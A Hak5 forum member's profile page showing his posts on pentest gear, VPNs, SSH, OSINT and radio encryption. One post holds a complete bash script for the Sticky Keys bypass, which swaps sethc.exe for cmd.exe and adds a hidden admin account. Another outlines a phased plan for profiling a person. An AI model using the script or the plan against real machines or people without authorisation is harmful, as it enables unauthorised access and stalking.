Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

About Kentj

  • Rank
    Hak5 Fan

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. I would say, it depends a lot... Are we talking about a vulnerability test, or a penetration test ? Running a scan for vulns, missing patches, or weak passwords are one thing, running a full test, is quite different. And,what is the scope for a test, how "far" are you allowed to go ? When it comes to equipment,a good laptop, running Kali, some Alfa Wireless cards, and you've got the basic gear you'll need. Everything else,is just "nice to have", not "need to have". But for "nice to have". A rubber ducky / Bunny, and a Odroid C2 and some lockpicks šŸ˜„ (and a veeeery patient Boss) /Kent
  2. Kentj

    DNS problem ?

    Hi guys šŸ™‚ Got somewhat of a rookie problem. Rented a new VPS, based on debian 9, and hooked it up to my DNS. My primary site / domain is www.labet.dk, the server is downloads.labet.dk. The strange thing is, if I try to ping it on downloads.labet.dk, I get a response from the right IP, but DNS , it shows up as mail.darrenmusic,com. When I log in, and run a netstat -a, this is the output root@downloads:~# netstat -a Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0* LISTEN tcp 0 0* LISTEN tcp 0 172 mail.darrenmusic.c:2222 80-197-123-156-ca:44938 ESTABLISHED tcp 0 0 mail.darrenmusic.:50180 m2420.contaboserve:http TIME_WAIT tcp6 0 0 [::]:2222 [::]:* LISTEN udp 0 0* Active UNIX domain sockets (servers and established) Proto RefCnt Flags Type State I-Node Path unix 2 [ ] DGRAM 13824 /run/systemd/cgroups-agent unix 2 [ ACC ] STREAM LISTENING 13828 /run/systemd/private unix 2 [ ACC ] STREAM I cant seem to find any services configured to mail.darrenmusic.com, so right now, Im really lost. Any thoughts would be really welcome... Sorry for asking rookie questions šŸ™‚
  3. Kentj

    hack mah school

    Enter stage left, grumpy old man , MUPPET SHOW THEME PLAYING... Young man...listen up, and listen veeeery carefully. Since RKiver gave you the short version, and right now, you're wondering why, I'll give it a try. Since you haven't gotten permission, dont do anything to those machines. just bypassing login restrictions, would be a crime. Launching any kind of exploit, botnet, or malware is a crime. Since you dont know what you're doing, its a real dissaster waiting to happen..period. Go do your learning on a virtual lab, or private lab network, not on your schools gear. But you could try and ask the network staff if you can give them a hand, because you want to learn, and maybe someday be an admin yourself. Some of them might actually think it's cool, and start you in the right direction. Exit stage right, grumpy old man
  4. Kentj

    sshd config Q

    Sorry for posing a stupid question... but why ? You can setup the client, to not connect if server is not in known_hosts, but as far as I see it, SSH wont function properly without sending servers public key. I'm not sure, but I really can't see the point in it either ;) If it' a matter of security, set key auth only, and disable ordinary password login. throw some fail2ban in front of it, and you should be fairly safe :)
  5. Or, just boot from a Kali Live system, mount the Windows drive. ------------sethcpatch.sh v2 start-------------- #! /bin/bash # cmd.exe --> sethc.exe copy patch # Target Windows XP - 10, Windows Server 2k, 2k3, 2k8, utestet pƄ Server 2016 # Version 0.2 - Juni 2018 # By kent j <kent@labet.dk> HELP() { echo "Run with patchwin / unpatchwin" } PATCH_WIN () { echo "patching windows sethc function...." sleep 2 mkdir patch cp sethc.exe patch/sethc.bak cp cmd.exe patch/cmd.bak rm sethc.exe cp cmd.exe sethc.exe echo "patching done ......" sleep 2 echo "Writing windows bat file..." cd patch touch useradd.bat echo "net user /add USER PASS" >useradd.bat echo "net localgroup administratorer USER /add" >>useradd.bat cd .. sleep 2 echo "useradd.bat written to c:\windows\system32\patch\useradd.bat" echo "Run with useradd.bat" sleep 2 } UNPATCH_WIN() { echo "unpatch Windows sethc.exe" sleep 2 rm sethc.exe rm cmd.exe cd patch cp sethc.bak ../sethc.exe cp cmd.bak ../cmd.exe cd .. rm -rf patch sleep 2 echo "Cleanup ended !" echo "sethc.exe & cmd.exe back to normal..." echo "Script terminated... " } case $1 in help) HELP ;; patchwin) PATCH_WIN ;; unpatchwin) UNPATCH_WIN ;; esac exit 0 -----------------sethcpatch.sh v2 End------------------ just add this to a custom Kali under /opt/tools/local/win (or whereever you like) Makes your life soo much easier when users are forgettng their passwords :D For use, copy it to the local windrive and run it. When in windows terminal, run the bat file. Log in, and enjoy admin privs :) /Kent
  6. just some quick thoughts ? For demo purposes, i would recommend a laptop running dual alfa wifi cards, as it's easier to use a laptop if something goes wrong, or you need to adapt. I usually do it that way, and keep the HAK5 stuff for easy depployment on field tests if need be. But, as for showing the dangers of wifi, i would say you're on the right track, if you can demonstrate deployment of malware, capturing credentials, dns spoofing, java-script injection and stuff like that. Just simple stuff, but with an impact none the less. It really shows why you shouldn't be using the network on McD or Starbucks without a VPN ? Something like DNSchef, Beef-Xss, Metasploit and Blackeye captive portal comes to mind ? As far as using videos, I think you're right. Better to make mistakes "live" than using a video. It better demonstrates what can be done and the tech behind it. Even though I failed at a demo, and had to try a second time, it gave everybody an opportunity to talk about the tech behind it, why it failed, what to do about it, and so on. So what could have been a dissaster, ended up begin a really nice talk with the people present about a lot of stuff related to security, and the ides and technologies behind the demo.
  7. If by doing sshfs you mean, mounting the PS as a harddrive from a workstation using ssh, yep, it can. just make a mount point on the workstation, and mount as usual. sshfs packet_squirrel_ip:/ /mount/point then you can find the PS under /mount/point. If it works the other way around, mounting the workstation as a remote drive on the PS, havent tried that . If the PS have sshfs installed, it should. but using PS as a remote drive does work, so editing payloads, is pretty easy :)
  8. A solution could be to setup your own openVPN server. Isn't that hard to do and it could give you some time to confirm it works as it should. I've testet a private VPN solution based on OpenVPN, from Linux workstations, and see no leaks from it. But, as with any kind of VPN solution, it's possible to sniff the traffik at the gateway, if not encrypted from that point forward. But it should get you through the Chinese firewall. As for phones, hmm. Anything on a GSM network, could possibly be monitored by the government. Something like Jitsi IM and encrypted videochat through VPN comes to mind, depending on your situation. But, as Digininja pointed out, it depends on what resources they want to spend on it, and would they bother for an ordinary bussinessman, conducting legal bussiness in China ? I guess you would be fine, just with an ordinary VPN solution, combined with some kind of encrypted messenger / videocall.
  9. How do you mean, "relates to companies" ? OSINT - Open Sources Intelligence gathering (Collecting info from open / public sources) HUMINT - Human Intelligence Gathering (info from people on the ground / human sources) CYBINT - Cyber intelligence SIGINT - Signal Intelligence gathering TECHINT - Analysis of technical capabillities of an enemy MEDINT - Medical records / information FININT - Financial information So OSINT is just the CIA's catchy term for gathering date from publically available sources ? Directed at a person, it would be using every public know source to gather info on that person or group. <Stalkerish mode ON> Websites, social media, phonebooks, public records, News sites / magazines and papers. <Stalkerish mode OFF> For keeping track of these records, and building a picture of how it relates, I would suggest "maltego" and "casefile", they were made for this, and really is a great help in organising the information in a logical order. Start thinking on yourself yourself an an example. What information is out there on you ? What kind is it (phone number, email, medical, address and so on) Who has this information, and who can access it ?, and access it under what circumstances ? How do you get to it ? Because it will help you to start thinking about whats out there on you, and how to protect it. But, more important, it will help you build a list on most types and sources of information that applies to everyone else If it were me, that had to start launch an operation into someone, it would most likely go something like this. OSINT PHASE (Passive phase) Phonebooks, websites, social media, professional networks, public records of ownership of buildings, and placement of buildings Public listed address Public listed phonenumber Public listed email & messenger handles Get photos, known whereabouts / favourite places they visits Job / education, what and where Have they published anything (books, papers, assignments and the like) HUMINT (Active recon Phase) Friends ?, coworkers ?, relatives ? Gossip at the places they visit ? Directed Social engineering attacks Photo, video. Audio gathering if necessary TECHINT Technical equipment they have access to (laptops, phones, workstations) Where do they use it and for what ? CYBINT Closer look at websites / Social Media profiles When done, all of this should provide you with information, that can help you to build a profile, and find out where to direct you attention next. Direct attack campaings if that is to your liking, which I really wouldn't recommend ? But if you're working in an efficient directed manner, you would be amazed of what info is actually out there, if you go about getting it, in an coordinated effective manner. If not anything else, it's a fun task. "Good luck double o seven, and do try to bring the gadgets back home to Q branch safely :D"
  10. Hmm, there would have to be a waveform of some sort. As i see it, it would be something like talkvoice ----> mic ---> Encryption PCB --->transmitter -------->AIR <------- Reciever ----> Decryption PCB --> speaker ---> Ear ? As far as I understand it, in some cases, the encryption function is just a base tone, some modulator function, and the transmission of the generated signal. It should / could be possible to reconstruct the signal from the base, and figure out what kind of modulation it is, apply it to the transmitted signal, and recover the clear voice signal. https://www.midians.com/specs/voice-scramblers-motorola-mototrbo-radios/vs-1000-mt1 Here is some encryption pcb's for Motorola truncated radios. They use, as far as i can tell, "just" some kind of filtration and modulation as encryption. I would imagine, as least theorethically, the encrypted voice from these can be recovered through trial and error, and massive computing power maybe ? If I understand the description of these correctly, they simply just run the base voice through some kind of known modulation filter, remove the sum, and transmit the difference in frequencies. If that's understood correctly, maybe it could be recovered by finding the base frequency, applying filters, until you have clear audio again. Just my thoughts on this. If I'm correct or not, I cant say ?
  11. Practically, no it's not possible to crack the system keys on truncated radio. The simplest way, would simply be to get hands on a radio you know is operating within the radio group / organisation you want to monitor, or bribe someone who know what it is. Finding it with bruteforce will cost a lot of time and special / custom software. And even in situation one, most radios is locked / protected from reading and changing the encryption keys & channel info, so no luck there. Depending on what radio system it is, some radios also employ key / authentication services, so unkown devices will never be approved on the system, and lost systems will get locked out from the radio network, so no lock there either. I know it sounds fun, but i should mention it's illegal in most countries to monitor police / fire department radios when they are encrypted or try to crack the encryption. Some info on truncated radio security mechanisms. https://www.rrmediagroup.com/Features/FeaturesDetails/FID/812 I would imagine it's impossible to recreate the transmission without the encryption / scrambler key, the same radio model, running on the same frequencies, and with the correct keys programmed into the scrambler /encryption module. Sorry, didn't wanted to spoil your day, but from what i've found out, it's simply to costly and to much work, to bother with it ? /Kent
  12. Yes there is. You simply post a sign saying "no cellphones", and confiscate them if they have them, and give them back after the event is over. If you don't want them to send data out, don't give them a hotspot to begin with. As far as blocking cellphone comms, forget it. Just trying to do so, is illegal (Think personal / micro GSM Cell site tower routing data and calls to a black hole in the ground.) If they use your wifi, you can try and log the data in transit, and only IF you tell them you do so, and they accept some form of monitoring in the case they are using your wifi. But, even so, it's wrong to do so, and it's easy for them to bypass (VPN anyone?) It can be done, but not legally. I would highly suggest you think of another way all in all, and your boss does the same. Easier to forbid the use of cellphones under the event. But for corporate espionage into the competition, well, thats another game, something you have to research for yourself. Just dont come crying here, when both of you end up behind bars ? /Kent
  13. (Taking on the tinfoil hat) Maybe it's just me being paranoid here, but storing confidential data offsite (3rd party provider), and no encryption. No way, no matter who it is. For a small organisation, I would say, privately owned and run server, LUKS drives, and SSHFS, with gpg as an extra layer for individual file encryption. Some realtime monitoring for file read/write (Inotify), and you're on your way :) Depending on the workstations, LUKS and LUKS-Nuke option, maybe try looking into luks-TPM or opengpg smartcards and luks, and you're well on your way to something secure :) (Taking off the tinfoil hat again)
  14. I would aggree with what others have said. 10 miles, ain't gonna happen with wifi. Custom built yagi at each end, and maybe...just maybe you'll get 2-3. Using yagi, and 2 watt wifi card, I've got 1500 M (across the local harbour and 1 building in between on one side) A much better route, as others have suggested, would be a small 12 volt system, in a case, with batteries, and a cellphone modem. A quick reverse ssh connection to a ssh server somewhere, and you're in bussiness :) Rig the case with a mercury emergency switch, some LUKS encryption, and you're also secured from theft and tampering :D A small footprint system, some Kali, a modem, a yagi, and a powerfull wifi card. Should be some seriously fun hours with that project :)
  • Create New...